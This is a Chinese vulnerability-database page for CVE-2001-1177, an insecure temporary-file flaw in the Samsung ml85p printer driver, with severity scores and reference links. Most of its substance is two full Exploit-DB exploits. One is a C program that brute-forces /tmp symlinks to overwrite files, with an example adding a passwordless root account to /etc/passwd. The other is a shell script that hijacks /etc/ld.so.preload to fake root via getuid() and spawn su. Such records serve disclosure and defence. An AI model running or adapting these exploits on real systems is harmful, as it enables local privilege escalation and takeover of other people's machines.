CVE-2001-1177
CVSS6.2
发布时间 :2001-07-17 00:00:00
修订时间 :2008-09-05 16:25:52
NMCOE    

[原文]ml85p in Samsung ML-85G GDI printer driver before 0.2.0 allows local users to overwrite arbitrary files via a symlink attack on temporary files.


[CNNVD]Samsung ML-85G GDI printer driver覆盖任意代码漏洞(CNNVD-200107-107)

        Samsung ML-85G GDI printer driver 0.2.0之前版本ml85p存在漏洞。本地用户借助临时文件上符号链接攻击覆盖任意代码。

- CVSS (基础分值)

CVSS分值: 6.2 [中等(MEDIUM)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:samsung:ml-85p_printer_driver:1.0Secure Computing ML-85P Printer Driver 1.0
cpe:/a:samsung:ml-85g_gdi_printer_driverSecure Computing ML-85G GDI Printer Driver

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1177
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1177
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-107
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2001-07/0284.html
(VENDOR_ADVISORY)  BUGTRAQ  20010717 Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)
http://xforce.iss.net/static/6845.php
(UNKNOWN)  XF  samsung-printer-temp-symlink(6845)
http://www.securityfocus.com/bid/3008
(VENDOR_ADVISORY)  BID  3008

- 漏洞信息

Samsung ML-85G GDI printer driver覆盖任意代码漏洞
中危 未知
2001-07-17 00:00:00 2005-08-17 00:00:00
本地  
        Samsung ML-85G GDI printer driver 0.2.0之前版本ml85p存在漏洞。本地用户借助临时文件上符号链接攻击覆盖任意代码。

- 公告与补丁

        

- 漏洞信息 (20999)

Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (1) (EDBID:20999)
hardware local
2001-07-10 Verified
0 Charles Stevenson
N/A [点击下载]
source: http://www.securityfocus.com/bid/3008/info

ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript.

ml85p does not check for symbolic links when creating image output files.

These files are created in /tmp with a guessable naming format, making it trivial for attackers to exploit this vulnerability.

Since user-supplied data is written to the target file, attackers may be able to elevate privileges.

/* ml85p-xpl.c
 *
 * Quick hack to exploit ml85p
 *
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 *
 * Example:
 *
 * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
 * $ ./ml85p-xpl /etc/passwd owned::0:0::/root:/bin/bash
 *
 * Then login as owned... etc..
 *
 * by Charles Stevenson <core@ezlink.com>
 *
 * July 10 2001
 *
 * shoutz b10z
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#include <time.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 10

void usage(char*);

int main(int argc, char **argv){
   char tempfile[128] = TEMPFILE;
   int fd, i;
   time_t the_time;
   char temp[512];
   
   if (argc < 3){
      usage(argv[0]);
   }

   if((fd = mkstemp(tempfile))==-1){
      fprintf(stderr, "Error creating %s!\n",tempfile);
      exit(1);
   }

   /* begin lazy slacker coding */
   fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
   fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

   /* backup old file */
   sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
   system(temp);
   
   /* set the date/time */
   sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
   system(temp);

   the_time = time(NULL);

   fprintf(stderr, "> creating a lot of symlinks\n");

   for (i=0;i<BRUTE;i++){
      /* BAD CODE: sprintf(gname,"/tmp/ml85g%d",time(0)); */
      sprintf(temp, "/tmp/ml85g%d", the_time+i);
      symlink(argv[1], temp);
   }

   sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s > file; ml85p
-sf file 2>&1>/dev/null & sleep 1; killall ml85p\n", argv[2]);
   fprintf(stderr, "Running a few times since I'm lazy.\n");
   for (i=0;i<BRUTE;i++){
      system(temp);
      //sleep(1);
   }

   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   fprintf(stderr, "> cleaning up\n");
   sprintf(temp, "/bin/rm -f /tmp/ml85*");
   system(temp);
   
   fprintf(stderr, "All done. Enjoy!\n");
   return 0;
}

void usage(char *name){
   
   fprintf(stderr, "usage: %s <filename> <data>\n", name);
   exit(1);
}

/* EOF */

		

- 漏洞信息 (21000)

Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (2) (EDBID:21000)
hardware local
2001-07-10 Verified
0 ml85p
N/A [点击下载]
source: http://www.securityfocus.com/bid/3008/info
 
ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript.
 
ml85p does not check for symbolic links when creating image output files.
 
These files are created in /tmp with a guessable naming format, making it trivial for attackers to exploit this vulnerability.
 
Since user-supplied data is written to the target file, attackers may be able to elevate privileges.

#!/bin/sh
# Exploit using /usr/bin/ml85p default setuid program on 
# Mandrake Linux 8.0
#
# You need to be in the sys group to be able to execute 
# ml85p.

echo "** ml85p exploit"
# set the required umask
umask 0

# get the number of seconds since 1970
DATE=`date +"%s"`
if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ]
then
	echo "** this exploit requires that /usr/bin/ml85p is setuid and 
executable."
	exit 1
fi

if [ ! -e /etc/ld.so.preload ] || [ ! -w /etc/ld.so.preload ]
then
	echo "** this exploit requires that /etc/ld.so.preload does not exist."
	exit 1
fi

echo "** creating file"
ln -s /etc/ld.so.preload /tmp/ml85g"$DATE"
echo "bleh" | /usr/bin/ml85p -s
rm /tmp/ml85g"$DATE"

echo "** creating shared library"
cat << _EOF_ > /tmp/g.c
int getuid(void) { return(0); }
_EOF_

echo "** compiling and linking shared object"
gcc -c -o /tmp/g.o /tmp/g.c
ld -shared -o /tmp/g.so /tmp/g.o
rm -f /tmp/g.c /tmp/g.o

echo "** rigging ld.so.preload"
echo "/tmp/g.so" > /etc/ld.so.preload
echo "** execute su. warning all getuid() calls will return(0) until you remove"
echo "** the line \"/tmp/g.so\" from /etc/ld.so.preload. removing /tmp/g.so 
without"
echo "** first fixing /etc/ld.so.preload may result in system malfunction"
su -
echo "** cleaning up"
> /etc/ld.so.preload
rm -f /tmp/g.so

		

- 漏洞信息 (21001)

Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (3) (EDBID:21001)
hardware local
2001-07-10 Verified
0 ml85p
N/A [点击下载]
source: http://www.securityfocus.com/bid/3008/info
  
ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript.
  
ml85p does not check for symbolic links when creating image output files.
  
These files are created in /tmp with a guessable naming format, making it trivial for attackers to exploit this vulnerability.
  
Since user-supplied data is written to the target file, attackers may be able to elevate privileges.

http://www.exploit-db.com/sploits/21001.tar.gz		

- 漏洞信息

1898
Samsung ml85p Printer Utility Symlink Local Privilege Escalation
Local Access Required Race Condition

- 漏洞描述

- 时间线

2001-07-16 Unknow
2001-07-16 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站